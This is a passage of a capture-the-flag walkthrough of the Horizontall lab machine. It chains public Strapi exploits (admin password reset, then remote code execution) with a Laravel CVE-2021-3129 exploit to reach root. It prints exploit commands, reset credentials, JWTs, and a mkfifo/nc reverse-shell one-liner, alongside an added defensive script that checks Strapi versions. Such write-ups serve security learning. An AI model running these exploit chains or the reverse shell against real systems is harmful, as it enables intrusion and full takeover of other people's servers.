Alright, so among all the directories, /admin was useful.
It uses Strapi CMS.
What's Strapi?
Strapi is an open-source headless CMS used for building fast and easily manageable APIs written in JavaScript. It enables developers to make flexible API structures easily using a beautiful user interface. Strapi can be used with various databases including MongoDB, PostgreSQL, etc.
Strapi Version
I didn't find anything on the website that tells us the Strapi version.
So, I used feroxbuster again to find subdirectories.
I found an interesting directory that gives the Strapi version used on the server (http://api-prod.horizontall.htb/admin/init).
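Since an unauthenticated /admin/init that reports the exact Strapi build is what made the rest of this possible, here is a small check a defender can run against their own Strapi deployments. It is an added example, not code from this writeup or from the linked exploit repositories; it assumes the /admin/init JSON carries the build in data.strapiVersion (as the Strapi 3 beta admin panel does) and uses the fact that CVE-2019-19609 was fixed in 3.0.0-beta.17.8.

```python
"""Check a Strapi deployment's exposed version against the CVE-2019-19609 fix.

Assumptions: GET /admin/init answers with JSON holding data.strapiVersion,
and CVE-2019-19609 is fixed from 3.0.0-beta.17.8 onwards.
"""
import json
import re
import urllib.request

FIXED_VERSION = "3.0.0-beta.17.8"

# Constructed sample body, modelled on an unauthenticated /admin/init reply.
SAMPLE_INIT_BODY = ('{"data":{"uuid":"00000000-0000-0000-0000-000000000000",'
                    '"currentEnvironment":"production","autoReload":false,'
                    '"strapiVersion":"3.0.0-beta.17.4"}}')


def parse_version(version: str) -> tuple:
    """Turn '3.0.0-beta.17.4' into a tuple that compares correctly.

    Pre-release builds sort below the matching stable release, so
    3.0.0-alpha.x < 3.0.0-beta.x < 3.0.0.
    """
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:-(alpha|beta)\.(\d+)(?:\.(\d+))?)?", version)
    if not m:
        raise ValueError(f"unrecognised Strapi version: {version!r}")
    major, minor, patch, tag, pre1, pre2 = m.groups()
    # Stable releases get a sentinel (2) that sorts above alpha (0) and beta (1).
    pre = (2,) if tag is None else ({"alpha": 0, "beta": 1}[tag], int(pre1), int(pre2 or 0))
    return (int(major), int(minor), int(patch)) + pre


def extract_version(init_body: str) -> str:
    """Pull data.strapiVersion out of an /admin/init response body."""
    return json.loads(init_body)["data"]["strapiVersion"]


def needs_patch(version: str) -> bool:
    """True when the reported build predates the CVE-2019-19609 fix."""
    return parse_version(version) < parse_version(FIXED_VERSION)


def check_instance(base_url: str, timeout: float = 5.0) -> dict:
    """Fetch /admin/init from your own deployment and report the verdict.

    A successful unauthenticated read is itself a finding: the endpoint
    should not reveal the build to anonymous clients.
    """
    with urllib.request.urlopen(f"{base_url.rstrip('/')}/admin/init", timeout=timeout) as r:
        version = extract_version(r.read().decode())
    return {"version": version, "needs_patch": needs_patch(version), "version_exposed": True}


if __name__ == "__main__":
    v = extract_version(SAMPLE_INIT_BODY)
    print(v, "-> needs patch" if needs_patch(v) else "-> ok")
```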
Public exploit link: https://www.exploit-db.com/exploits/50239
Download or copy the exploit to get login details.
Login details:
└─$ python3 exploit.py http://api-prod.horizontall.htb
[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit
[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjQzMjk1MDQ3LCJleHAiOjE2NDU4ODcwNDd9.FxVxaCiduAAdIqnIHvmox5o330ARzD1-Z7DPAPjxYdg
Login details: admin:SuperStrongPassword1
User Shell
Exploit link for RCE: https://github.com/diego-tella/CVE-2019-19609-EXPLOIT
# TERMINAL 1:
# Set up a listener before using the exploit
└─$ nc -nvlp 4444
listening on [any] 4444 ...

# TERMINAL 2:
└─$ python3 rce.py -d api-prod.horizontall.htb -jwt eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjQzMjk1NzczLCJleHAiOjE2NDU4ODc3NzN9.4aUFn0Cx5J5hpjbtY-RxS5TNPVjG101BMeGnY22XrCQ -l <YOUR_IP> -p 4444
Exploit used to get root privileges: https://github.com/nth347/CVE-2021-3129_exploit
└─$ python3 root.py http://127.0.0.1:8000 Monolog/RCE1 whoami
[i] Trying to clear logs
[+] Logs cleared
[+] PHPGGC found. Generating payload and deploy it to the target
[+] Successfully converted logs to PHAR
[+] PHAR deserialized. Exploited
root
[i] Trying to clear logs
[+] Logs cleared
Root Flag
└─$ python3 root.py http://127.0.0.1:8000 Monolog/RCE1 "cat /root/root.txt"
[i] Trying to clear logs
[+] Logs cleared
[+] PHPGGC found. Generating payload and deploy it to the target
[+] Successfully converted logs to PHAR
[+] PHAR deserialized. Exploited
edaf3a8f9_<--SNIPPED-->
[i] Trying to clear logs
[+] Logs cleared
Root Shell (nc part)
Start an nc listener on any port.
└─$ python3 root.py http://127.0.0.1:8000 Monolog/RCE1 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <YOUR_IP> <PORT> >/tmp/f"
[i] Trying to clear logs
[+] Logs cleared
[+] PHPGGC found. Generating payload and deploy it to the target
[+] Successfully converted logs to PHAR
[i] There is no output
Shell
└─$ nc -nvlp 6666
listening on [any] 6666 ...
connect to [<YOUR_IP_WOULD_BE_HERE>] from (UNKNOWN) [10.10.11.105] 34418
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)